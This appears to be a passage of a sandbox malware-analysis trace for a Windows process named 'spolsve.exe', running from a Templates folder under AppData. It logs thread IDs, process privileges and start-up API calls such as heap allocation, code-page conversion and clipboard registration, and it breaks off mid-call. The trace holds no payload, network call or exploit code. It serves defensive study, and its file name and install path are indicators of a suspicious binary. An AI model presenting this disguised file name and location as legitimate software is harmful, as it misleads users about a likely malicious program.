Thread: id = 36 os_tid = 0x6d4 Thread: id = 37 os_tid = 0x1384 Thread: id = 38 os_tid = 0xed0 Thread: id = 39 os_tid = 0x764 Thread: id = 40 os_tid = 0x12f0 Thread: id = 41 os_tid = 0x834 Thread: id = 42 os_tid = 0x7ec Thread: id = 43 os_tid = 0xf8c Thread: id = 44 os_tid = 0x960 Thread: id = 45 os_tid = 0x13b4 Thread: id = 46 os_tid = 0xfe4 Thread: id = 47 os_tid = 0xfc8 Thread: id = 48 os_tid = 0xd94 Thread: id = 49 os_tid = 0x13e4 Thread: id = 50 os_tid = 0x1304 Thread: id = 51 os_tid = 0x910 Thread: id = 52 os_tid = 0x1018 Thread: id = 53 os_tid = 0x9dc Thread: id = 54 os_tid = 0x102c Thread: id = 55 os_tid = 0x1040 Thread: id = 56 os_tid = 0x1088 Thread: id = 57 os_tid = 0x370 Thread: id = 58 os_tid = 0xdb8 Thread: id = 60 os_tid = 0xc28 Thread: id = 61 os_tid = 0xe48 Thread: id = 62 os_tid = 0xe5c Thread: id = 64 os_tid = 0xd54 Thread: id = 78 os_tid = 0x1308 Thread: id = 79 os_tid = 0x11e0 Thread: id = 80 os_tid = 0x106c Thread: id = 81 os_tid = 0xd80 Thread: id = 82 os_tid = 0xc7c Thread: id = 83 os_tid = 0x121c Process: id = "2" image_name = "spolsve.exe" filename = "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe" page_root = "0x73437000" os_pid = "0xa78" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1374" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000110fb" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0x784 [0076.003] GetVersion () returned 0x23f00206 [0076.003] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2030000 [0076.378] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x140) returned 0x20305a8 [0076.378] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x41c4) returned 0x20306f0 [0076.379] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x20f0000 [0076.379] VirtualAlloc (lpAddress=0x20f0000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x20f0000 [0076.380] GetCurrentThreadId () returned 0x784 [0076.380] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x480) returned 0x20348c0 [0076.380] GetStartupInfoA (in: lpStartupInfo=0x19febc | out: lpStartupInfo=0x19febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0076.380] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0076.380] GetFileType (hFile=0x0) returned 0x0 [0076.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0076.380] GetFileType (hFile=0x0) returned 0x0 [0076.380] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0076.380] GetFileType (hFile=0x0) returned 0x0 [0076.380] SetHandleCount (uNumber=0x20) returned 0x20 [0076.380] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe\" " [0076.380] GetEnvironmentStringsW () returned 0x540550* [0076.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1545, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1545 [0076.380] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x610) returned 0x2034d48 [0076.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1545, lpMultiByteStr=0x2034d48, cbMultiByte=1545, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1545 [0076.380] FreeEnvironmentStringsW (penv=0x540550) returned 1 [0076.380] GetACP () returned 0x4e4 [0076.380] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec8 | out: lpCPInfo=0x19fec8) returned 1 [0076.380] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fea0 | out: lpCPInfo=0x19fea0) returned 1 [0076.380] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0076.380] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f744, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ") returned 256 [0076.381] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0076.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0076.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f720, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ") returned 256 [0076.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0076.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ", cchSrc=256, lpDestStr=0x19f520, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ") returned 256 [0076.381] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0076.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f700, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ") returned 256 [0076.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0076.381] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ", cchSrc=256, lpDestStr=0x19f500, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ") returned 256 [0076.381] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虜CĀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0076.381] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4371dc, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe")) returned 0x47 [0076.383] HeapFree (in: hHeap=0x2030000, dwFlags=0x0, lpMem=0x2034d48 | out: hHeap=0x2030000) returned 1 [0076.383] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75b20000 [0076.383] GetProcAddress (hModule=0x75b20000, lpProcName="IsProcessorFeaturePresent") returned 0x75b35960 [0076.383] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0076.383] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x800) returned 0x2034d48 [0076.383] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40dc92) returned 0x0 [0076.385] GlobalLock (hMem=0x1f90004) returned 0x50e3f8 [0076.385] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x50f348 [0076.385] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x53eea8 [0076.385] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x5178b0 [0076.385] GetVersion () returned 0x23f00206 [0076.385] LocalAlloc (uFlags=0x40, uBytes=0x1074) returned 0x540550 [0076.385] GetACP () returned 0x4e4 [0076.386] GetCursorPos (in: lpPoint=0x4350bc | out: lpPoint=0x4350bc*(x=925, y=293)) returned 1 [0076.386] LocalAlloc (uFlags=0x40, uBytes=0x3c) returned 0x5116a0 [0076.386] LocalReAlloc (hMem=0x5178b0, uBytes=0xc, uFlags=0x2) returned 0x50e988 [0076.386] GetCurrentThread () returned 0xfffffffe [0076.386] GetCurrentThreadId () returned 0x784 [0076.386] RegisterClipboardFormatA (lpszFormat="commctrl_DragListMsg") returned 0xc217 [0076.395] GetVersion () returned 0x23f00206 [0076.395] GetProcessVersion (ProcessId=0x0) returned 0x40000 [0076.395] GetSystemMetrics (nIndex=11) returned 32 [0077.837] GetSystemMetrics (nIndex=12) returned 32 [0077.837] GetSystemMetrics (nIndex=2) returned 17 [0077.837] GetSystemMetrics (nIndex=3) returned 17 [0077.837] GetDC (hWnd=0x0) returned 0x260108d6 [0077.837] GetDeviceCaps (hdc=0x260108d6, index=88) returned 96 [0077.837] GetDeviceCaps (hdc=0x260108d6, index=90) returned 96 [0077.837] ReleaseDC (hWnd=0x0, hDC=0x260108d6) returned 1 [0077.837] GetSysColor (nIndex=15) returned 0xf0f0f0 [0077.837] GetSysColor (nIndex=16) returned 0xa0a0a0 [0077.837] GetSysColor (nIndex=20) returned 0xffffff [0077.837] GetSysColor (nIndex=18) returned 0x0 [0077.837] GetSysColor (nIndex=6) returned 0x646464 [0077.837] GetSysColorBrush (nIndex=15) returned 0x100072 [0077.838] GetSysColorBrush (nIndex=6) returned 0x10007a [0077.838] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0077.838] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0077.838] GetOEMCP () returned 0x1b5 [0077.838] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x19fed0 | out: lpCPInfo=0x19fed0) returned 1 [0077.838] GetVersion () returned 0x23f00206 [0077.838] GetVersion () returned 0x23f00206 [0077.838] GetVersion () returned 0x23f00206 [0077.838] RegisterClipboardFormatA (lpszFormat="Native") returned 0xc004 [0077.838] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0077.838] RegisterClipboardFormatA (lpszFormat="ObjectLink") returned 0xc002 [0077.838] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0077.838] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0077.838] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0077.838] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0077.838] RegisterClipboardFormatA 